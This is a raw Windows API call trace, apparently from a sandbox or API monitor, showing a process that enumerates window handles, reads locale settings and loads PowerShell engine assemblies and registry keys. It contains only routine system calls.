	[0321.131] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xae8
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb14
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x95c
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa8c
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x46c
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb3c
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa90
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xad0
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa9c
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xaa0
	[0321.131] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb1c
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x7e0
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa74
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x694
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xa28
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x9b0
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x8d8
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x940
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x93c
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4ec
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x150
	[0321.132] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x720
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x3c4
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x7d4
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x6c8
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb54
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb54
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb5c
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x838
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x818
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x5b8
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x494
	[0321.133] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x1ec
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x440
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x7e8
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x730
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x2c8
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x31c
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x330
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x128
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x5c8
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x6f8
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x358
	[0321.134] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x73c
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0xb0
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x250
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x240
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x790
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x61c
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x568
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x538
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x540
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x79c
	[0321.135] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x4e0
	[0321.136] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x460
	[0321.136] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x10d780 | out: lpdwProcessId=0x10d780) returned 0x778
	[0321.139] WerSetFlags () returned 0x0
	[0321.146] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0321.628] CoTaskMemFree (pv=0x0) 
	[0321.629] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10dae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10dae0 | out: pulNumLanguages=0x10dae8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10dae0) returned 1
	[0321.629] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x10dae8, pwszLanguagesBuffer=0x2c916c0, pcchLanguagesBuffer=0x10dae0 | out: pulNumLanguages=0x10dae8, pwszLanguagesBuffer=0x2c916c0, pcchLanguagesBuffer=0x10dae0) returned 1
	[0321.634] CoTaskMemAlloc (cb=0x24) returned 0x3abdb0
	[0321.634] GetUserDefaultLocaleName (in: lpLocaleName=0x3abdb0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0321.634] CoTaskMemFree (pv=0x3abdb0) 
	[0321.654] CoTaskMemAlloc (cb=0x104) returned 0x3a4b90
	[0321.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a4b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.655] CoTaskMemFree (pv=0x3a4b90) 
	[0321.657] CoTaskMemAlloc (cb=0x104) returned 0x3a4b90
	[0321.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a4b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.657] CoTaskMemFree (pv=0x3a4b90) 
	[0321.659] CoTaskMemAlloc (cb=0x104) returned 0x3a4b90
	[0321.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a4b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0321.659] CoTaskMemFree (pv=0x3a4b90) 
	[0322.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.124] SetErrorMode (uMode=0x1) returned 0x1
	[0322.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10d760 | out: lpFileInformation=0x10d760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0322.124] SetErrorMode (uMode=0x1) returned 0x1
	[0322.124] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10d9d0 | out: lpdwHandle=0x10d9d0) returned 0x94c
	[0322.125] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c94f50 | out: lpData=0x2c94f50) returned 1
	[0322.126] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d948, puLen=0x10d940 | out: lplpBuffer=0x10d948*=0x2c94fec, puLen=0x10d940) returned 1
	[0322.126] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c950c8, puLen=0x10d8b0) returned 1
	[0322.126] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0322.126] CoTaskMemAlloc (cb=0x2e) returned 0x3af290
	[0322.126] lstrcpyW (in: lpString1=0x3af290, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0322.126] CoTaskMemFree (pv=0x3af290) 
	[0322.126] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c9511c, puLen=0x10d8b0) returned 1
	[0322.126] lstrlenW (lpString="System.Management.Automation") returned 28
	[0322.126] CoTaskMemAlloc (cb=0x3c) returned 0x36e670
	[0322.126] lstrcpyW (in: lpString1=0x36e670, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0322.126] CoTaskMemFree (pv=0x36e670) 
	[0322.126] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c95178, puLen=0x10d8b0) returned 1
	[0322.127] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0322.127] CoTaskMemAlloc (cb=0x20) returned 0x3abe10
	[0322.127] lstrcpyW (in: lpString1=0x3abe10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0322.127] CoTaskMemFree (pv=0x3abe10) 
	[0322.127] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c951b8, puLen=0x10d8b0) returned 1
	[0322.127] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0322.127] CoTaskMemAlloc (cb=0x44) returned 0x36e670
	[0322.127] lstrcpyW (in: lpString1=0x36e670, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0322.127] CoTaskMemFree (pv=0x36e670) 
	[0322.127] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c95220, puLen=0x10d8b0) returned 1
	[0322.127] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0322.127] CoTaskMemAlloc (cb=0x76) returned 0x3511f0
	[0322.127] lstrcpyW (in: lpString1=0x3511f0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0322.127] CoTaskMemFree (pv=0x3511f0) 
	[0322.127] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c952bc, puLen=0x10d8b0) returned 1
	[0322.127] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0322.127] CoTaskMemAlloc (cb=0x44) returned 0x36e670
	[0322.127] lstrcpyW (in: lpString1=0x36e670, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0322.127] CoTaskMemFree (pv=0x36e670) 
	[0322.127] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c95320, puLen=0x10d8b0) returned 1
	[0322.127] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0322.127] CoTaskMemAlloc (cb=0x58) returned 0x372350
	[0322.128] lstrcpyW (in: lpString1=0x372350, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0322.128] CoTaskMemFree (pv=0x372350) 
	[0322.128] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c9539c, puLen=0x10d8b0) returned 1
	[0322.128] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0322.128] CoTaskMemAlloc (cb=0x20) returned 0x3abe10
	[0322.128] lstrcpyW (in: lpString1=0x3abe10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0322.128] CoTaskMemFree (pv=0x3abe10) 
	[0322.128] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x2c95044, puLen=0x10d8b0) returned 1
	[0322.128] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0322.128] CoTaskMemAlloc (cb=0x66) returned 0x3a35a0
	[0322.128] lstrcpyW (in: lpString1=0x3a35a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0322.128] CoTaskMemFree (pv=0x3a35a0) 
	[0322.128] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x0, puLen=0x10d8b0) returned 0
	[0322.128] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x0, puLen=0x10d8b0) returned 0
	[0322.128] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x10d8b8, puLen=0x10d8b0 | out: lplpBuffer=0x10d8b8*=0x0, puLen=0x10d8b0) returned 0
	[0322.128] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d888, puLen=0x10d880 | out: lplpBuffer=0x10d888*=0x2c94fec, puLen=0x10d880) returned 1
	[0322.128] CoTaskMemAlloc (cb=0x204) returned 0x3576b0
	[0322.128] VerLanguageNameW (in: wLang=0x0, szLang=0x3576b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0322.128] CoTaskMemFree (pv=0x3576b0) 
	[0322.129] VerQueryValueW (in: pBlock=0x2c94f50, lpSubBlock="\\", lplpBuffer=0x10d8d8, puLen=0x10d8d0 | out: lplpBuffer=0x10d8d8*=0x2c94f78, puLen=0x10d8d0) returned 1
	[0322.137] CoTaskMemAlloc (cb=0x104) returned 0x3a4b90
	[0322.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a4b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.138] CoTaskMemFree (pv=0x3a4b90) 
	[0322.142] CoTaskMemAlloc (cb=0x104) returned 0x3a4b90
	[0322.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a4b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.142] CoTaskMemFree (pv=0x3a4b90) 
	[0322.146] lstrlenW (lpString="䅁") returned 1
	[0322.156] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d7a8 | out: phkResult=0x10d7a8*=0x2fc) returned 0x0
	[0322.158] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d798 | out: phkResult=0x10d798*=0x300) returned 0x0
	[0322.158] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d828 | out: phkResult=0x10d828*=0x304) returned 0x0
	[0322.514] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d76c, lpData=0x0, lpcbData=0x10d768*=0x0 | out: lpType=0x10d76c*=0x1, lpData=0x0, lpcbData=0x10d768*=0x56) returned 0x0
	[0322.515] CoTaskMemAlloc (cb=0x5a) returned 0x3a3530
	[0322.515] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d73c, lpData=0x3a3530, lpcbData=0x10d738*=0x56 | out: lpType=0x10d73c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d738*=0x56) returned 0x0
	[0322.516] CoTaskMemFree (pv=0x3a3530) 
	[0322.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0322.544] CoTaskMemAlloc (cb=0x104) returned 0x3a4b90
	[0322.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a4b90, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0322.545] CoTaskMemFree (pv=0x3a4b90) 
	[0324.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0324.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0325.741] CoTaskMemAlloc (cb=0x104) returned 0x3b9df0
	[0325.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b9df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.741] CoTaskMemFree (pv=0x3b9df0) 
	[0325.742] CoTaskMemAlloc (cb=0x104) returned 0x3b9df0
	[0325.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b9df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0325.742] CoTaskMemFree (pv=0x3b9df0) 
	[0326.709] CoTaskMemAlloc (cb=0x104) returned 0x3badf0
	[0326.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3badf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.709] CoTaskMemFree (pv=0x3badf0) 
	[0326.711] CoTaskMemAlloc (cb=0x104) returned 0x3badf0
	[0326.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3badf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.711] CoTaskMemFree (pv=0x3badf0) 
	[0326.711] CoTaskMemAlloc (cb=0x104) returned 0x3badf0
	[0326.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3badf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.711] CoTaskMemFree (pv=0x3badf0) 
	[0328.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0328.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0329.086] CoTaskMemAlloc (cb=0x104) returned 0x3c61f0
	[0329.086] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c61f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.086] CoTaskMemFree (pv=0x3c61f0) 
	[0329.090] CoTaskMemAlloc (cb=0x104) returned 0x3c61f0
	[0329.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c61f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.090] CoTaskMemFree (pv=0x3c61f0) 
	[0329.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0329.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.103] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x10d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
